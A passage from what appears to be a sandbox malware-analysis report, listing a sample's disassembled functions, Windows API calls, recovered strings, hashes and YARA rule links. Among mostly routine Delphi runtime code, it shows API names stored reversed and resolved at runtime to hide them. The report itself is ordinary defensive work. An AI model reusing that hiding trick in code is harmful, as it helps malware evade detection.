                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                      • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                      • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                      • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                      Function 0289D214 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0289D21D
                        • Part of subcall function 0289D1E8: GetProcAddress.KERNEL32(00000000), ref: 0289D201
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProc
                      • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                      • API String ID: 1646373207-1918263038
                      • Opcode ID: 0a09cebae0315e9dc28a66b11e6f7c0fba7028c7cb5d231eea5de29ea2c8bcf6
                      • Instruction ID: 3300339cd46ec7f3ee8912e062ca989361d07d33ccfa5f875ae34347d7cb28c1
                      • Opcode Fuzzy Hash: 0a09cebae0315e9dc28a66b11e6f7c0fba7028c7cb5d231eea5de29ea2c8bcf6
                      • Instruction Fuzzy Hash: 14410C7EA842085B5E087B6D7500827FFDED6C97103A8841BBA04CB788DDB1BD594E7E
                      Function 028A6E58 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleA.KERNEL32(ole32.dll), ref: 028A6E5E
                      • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 028A6E6F
                      • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 028A6E7F
                      • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 028A6E8F
                      • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 028A6E9F
                      • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 028A6EAF
                      • GetProcAddress.KERNEL32 ref: 028A6EBF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: AddressProc$HandleModule
                      • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                      • API String ID: 667068680-2233174745
                      • Opcode ID: 04b364091ec235a1d63c59dec21024e1154272aea569d98f360c231bd15d2481
                      • Instruction ID: 6dcc19a2224de4aca5fbc1bd4712bc70ec5269c12f4e9da87a1903efda48911c
                      • Opcode Fuzzy Hash: 04b364091ec235a1d63c59dec21024e1154272aea569d98f360c231bd15d2481
                      • Instruction Fuzzy Hash: DDF09EBC9847316EBF027F749C918772B5DA91168435C2819A502E5A87FF7984304B51
                      Function 02892530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                      Download Yara Rule
                      APIs
                      • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 028928CE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Message
                      • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                      • API String ID: 2030045667-32948583
                      • Opcode ID: a5f1d13035eb8e03cd8058cbe49f7a85657567bb817f806faeb3db61bbd5dcf3
                      • Instruction ID: 1fde73932357c719c959b4eb28cf2ea815647205f34aad37486cb4099dafae0e
                      • Opcode Fuzzy Hash: a5f1d13035eb8e03cd8058cbe49f7a85657567bb817f806faeb3db61bbd5dcf3
                      • Instruction Fuzzy Hash: 84A1073CA04254AFDF21AA2CCC84BD876E5EB09314F1801E5DD4DEB38ACB759989CF51
                      Function 0289252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                      Download Yara Rule
                      Strings
                      • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02892849
                      • Unexpected Memory Leak, xrefs: 028928C0
                      • bytes: , xrefs: 0289275D
                      • 7, xrefs: 028926A1
                      • The unexpected small block leaks are:, xrefs: 02892707
                      • An unexpected memory leak has occurred. , xrefs: 02892690
                      • , xrefs: 02892814
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID:
                      • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                      • API String ID: 0-2723507874
                      • Opcode ID: 6e85c248001a515c84f5076380aed61a0a1132958a1d2af5ea1e4407e450c388
                      • Instruction ID: fa772b88f966f967225c29b11d265f4c408c8eb594972a172fe374f1b4b1dcf7
                      • Opcode Fuzzy Hash: 6e85c248001a515c84f5076380aed61a0a1132958a1d2af5ea1e4407e450c388
                      • Instruction Fuzzy Hash: C171D43CA04258AFDF219B2CCC84BD9B6E5EB09314F1801E5D94DE7289CB7549C5CF52
                      Function 0289BD40 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                      Download Yara Rule
                      APIs
                      • GetThreadLocale.KERNEL32(00000000,0289C00B,?,?,00000000,00000000), ref: 0289BD76
                        • Part of subcall function 0289A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0289A762
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Locale$InfoThread
                      • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                      • API String ID: 4232894706-2493093252
                      • Opcode ID: 0a81b4b8e6154283f423653484a013178925285ab997f8593a3e7def3c39c6c1
                      • Instruction ID: 6e5ed7fe4b9cff6fd881a690fc4fffde495082b9ac76620e6ef6a488e4bc8617
                      • Opcode Fuzzy Hash: 0a81b4b8e6154283f423653484a013178925285ab997f8593a3e7def3c39c6c1
                      • Instruction Fuzzy Hash: 0C61733C7101489BDF04EBE8D850B9F77F79B88300F189435E205EB745CA3AD90A9B62
                      Function 028AAE18 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                      Download Yara Rule
                      APIs
                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 028AAE38
                      • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 028AAE4F
                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 028AAEE3
                      • IsBadReadPtr.KERNEL32(?,00000002), ref: 028AAEEF
                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 028AAF03
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Read$HandleModule
                      • String ID: KernelBase$LoadLibraryExA
                      • API String ID: 2226866862-113032527
                      • Opcode ID: e9778b8f7f5410bb8f3c0b06abe01951ac09fb9cdde240e6604f380265c72492
                      • Instruction ID: 654bdb466c2b9d231f531f97783e0f87163b656976c1c4f199d4d32ac536e0ea
                      • Opcode Fuzzy Hash: e9778b8f7f5410bb8f3c0b06abe01951ac09fb9cdde240e6604f380265c72492
                      • Instruction Fuzzy Hash: 7D3170BDA40305BBEB64DF68CC95F6A77B8AF04368F044510EA58DB681DB70A950CBA1
                      Function 0289432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                      Download Yara Rule
                      APIs
                      • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028943F3,?,?,028F17C8,?,?,028BE7A8,0289655D,028BD30D), ref: 02894365
                      • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028943F3,?,?,028F17C8,?,?,028BE7A8,0289655D,028BD30D), ref: 0289436B
                      • GetStdHandle.KERNEL32(000000F5,028943B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028943F3,?,?,028F17C8), ref: 02894380
                      • WriteFile.KERNEL32(00000000,000000F5,028943B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028943F3,?,?), ref: 02894386
                      • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 028943A4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: FileHandleWrite$Message
                      • String ID: Error$Runtime error at 00000000
                      • API String ID: 1570097196-2970929446
                      • Opcode ID: fe271414dcffe75aba7719b60decb5f91bfe9b2196639081408e25e351a4e277
                      • Instruction ID: 2ce8129848c4ac31de6221d2e98611a9df36ee2d0123c906b8118d9a5a6b3eb5
                      • Opcode Fuzzy Hash: fe271414dcffe75aba7719b60decb5f91bfe9b2196639081408e25e351a4e277
                      • Instruction Fuzzy Hash: BDF0F07CAC8304BCFE11A274AC0AFD9335C4B44B10F5C0A09B328E89D087A860C5AB2A
                      Function 0289AE44 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0289ACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0289ACD9
                        • Part of subcall function 0289ACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0289ACFD
                        • Part of subcall function 0289ACBC: GetModuleFileNameA.KERNEL32(02890000,?,00000105), ref: 0289AD18
                        • Part of subcall function 0289ACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0289ADAE
                      • CharToOemA.USER32(?,?), ref: 0289AE7B
                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0289AE98
                      • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0289AE9E
                      • GetStdHandle.KERNEL32(000000F4,0289AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0289AEB3
                      • WriteFile.KERNEL32(00000000,000000F4,0289AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0289AEB9
                      • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0289AEDB
                      • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0289AEF1
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                      • String ID:
                      • API String ID: 185507032-0
                      • Opcode ID: 45b82c69e6190c6d9fcee0659134bbfbedb63e1bec8cfd462068ee5315687bbb
                      • Instruction ID: 3e73a28074575353351ff68bb198ab1ee81177899a9e4419026034aa4ef83148
                      • Opcode Fuzzy Hash: 45b82c69e6190c6d9fcee0659134bbfbedb63e1bec8cfd462068ee5315687bbb
                      • Instruction Fuzzy Hash: 6C1170BE544204BEDE01FB98CC84F9F77EDAB44340F480A19B754DA0D0EA71E9448B67
                      Function 0289E50C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                      Download Yara Rule
                      APIs
                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0289E5A5
                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0289E5C1
                      • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0289E5FA
                      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0289E677
                      • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0289E690
                      • VariantCopy.OLEAUT32(?,00000000), ref: 0289E6C5
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                      • String ID:
                      • API String ID: 351091851-0
                      • Opcode ID: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
                      • Instruction ID: df668d165b0b4943757b4578991e3133c5d79df4e154319c67d44fd53961d20e
                      • Opcode Fuzzy Hash: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
                      • Instruction Fuzzy Hash: 6E51EA7E9006299BCF22EB58CD80BD9B7BDAB4D304F0841D6E509E7211DA34AF808F65
                      Function 02893568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                      Download Yara Rule
                      APIs
                      • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0289358A
                      • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,028935D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028935BD
                      • RegCloseKey.ADVAPI32(?,028935E0,00000000,?,00000004,00000000,028935D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028935D3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                      • API String ID: 3677997916-4173385793
                      • Opcode ID: e0ab9e39d8030e228a5d648333c004893531e30b50635a2537bf7f81213e24bb
                      • Instruction ID: bdf2e6707c24d1e50e2c8dc7f6f6276260500264d5c71220309a0fa5eafd6cec
                      • Opcode Fuzzy Hash: e0ab9e39d8030e228a5d648333c004893531e30b50635a2537bf7f81213e24bb
                      • Instruction Fuzzy Hash: B501B57DA44208BAEF12DBD18D42BBD77ECE708B10F5405A5BA04D6680E674A610DA59
                      Function 028A80C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028A8148,?,?,00000000,00000000,?,028A8061,00000000,KernelBASE,00000000,00000000,028A8088), ref: 028A810D
                      • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028A8113
                      • GetProcAddress.KERNEL32(?,?), ref: 028A8125
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: AddressProc$HandleModule
                      • String ID: Kernel32$sserddAcorPteG
                      • API String ID: 667068680-1372893251
                      • Opcode ID: 2f7f1ab0d495390d20aa7346947e0403abab7d5a1a2d645982f5e81c2e5d7372
                      • Instruction ID: fdb7e3b41b161667648583d2858696716968cb9032f53f36fab77941847afa9a
                      • Opcode Fuzzy Hash: 2f7f1ab0d495390d20aa7346947e0403abab7d5a1a2d645982f5e81c2e5d7372
                      • Instruction Fuzzy Hash: B301627CA40308AFFB01EFA8D851E5EB7AEEB49710F554865FA00D7750EA74A9118A21
                      Function 0289A9D0 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                      Download Yara Rule
                      APIs
                      • GetThreadLocale.KERNEL32(?,00000000,0289AA67,?,?,00000000), ref: 0289A9E8
                        • Part of subcall function 0289A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0289A762
                      • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0289AA67,?,?,00000000), ref: 0289AA18
                      • EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 0289AA23
                      • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0289AA67,?,?,00000000), ref: 0289AA41
                      • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 0289AA4C
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Locale$InfoThread$CalendarEnum
                      • String ID:
                      • API String ID: 4102113445-0
                      • Opcode ID: 2cda8d488d612e998fb9bb7a0b63acdfbb0fa470f951eb8a9f946dc98ec1733b
                      • Instruction ID: ffd40770d0002e9ba8d988c8cf985033175b7de6fdbee11075d82f68fbbfa50a
                      • Opcode Fuzzy Hash: 2cda8d488d612e998fb9bb7a0b63acdfbb0fa470f951eb8a9f946dc98ec1733b
                      • Instruction Fuzzy Hash: 1E01DB3D6402546FFF06EA7CCD12F6E739DDB46710F9D0160F610E67C0E5689E108A66
                      Function 0289AA80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                      Download Yara Rule
                      APIs
                      • GetThreadLocale.KERNEL32(?,00000000,0289AC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0289AAAF
                        • Part of subcall function 0289A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0289A762
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Locale$InfoThread
                      • String ID: eeee$ggg$yyyy
                      • API String ID: 4232894706-1253427255
                      • Opcode ID: 66879e4337b009d9dff6165383638e5177ef595d01e422bc7a2f7cbb21334fe8
                      • Instruction ID: cb99d7dfb2215a088ac31e7bf81ab38ad7db8fc71879659affc7024b90cddffa
                      • Opcode Fuzzy Hash: 66879e4337b009d9dff6165383638e5177ef595d01e422bc7a2f7cbb21334fe8
                      • Instruction Fuzzy Hash: E541057C30810D4FEF19EB7C888067EB3EBDB85208B5C4525E556CB344EA79E906CA22
                      Function 028A8018 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,028A8088,?,?,00000000,?,028A79FE,ntdll,00000000,00000000,028A7A43,?,?,00000000), ref: 028A8056
                        • Part of subcall function 028A80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028A8148,?,?,00000000,00000000,?,028A8061,00000000,KernelBASE,00000000,00000000,028A8088), ref: 028A810D
                        • Part of subcall function 028A80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028A8113
                        • Part of subcall function 028A80C0: GetProcAddress.KERNEL32(?,?), ref: 028A8125
                      • GetModuleHandleA.KERNELBASE(?), ref: 028A806A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: HandleModule$AddressProc
                      • String ID: AeldnaHeludoMteG$KernelBASE
                      • API String ID: 1883125708-1952140341
                      • Opcode ID: 8d48aba0903389f6d7654840ba1d92c057f2b0b6824b886b462efb2b4379b53b
                      • Instruction ID: 49c74fd21dbfd46b1609706105509821034fac63f4848770222b0aa7a86428a9
                      • Opcode Fuzzy Hash: 8d48aba0903389f6d7654840ba1d92c057f2b0b6824b886b462efb2b4379b53b
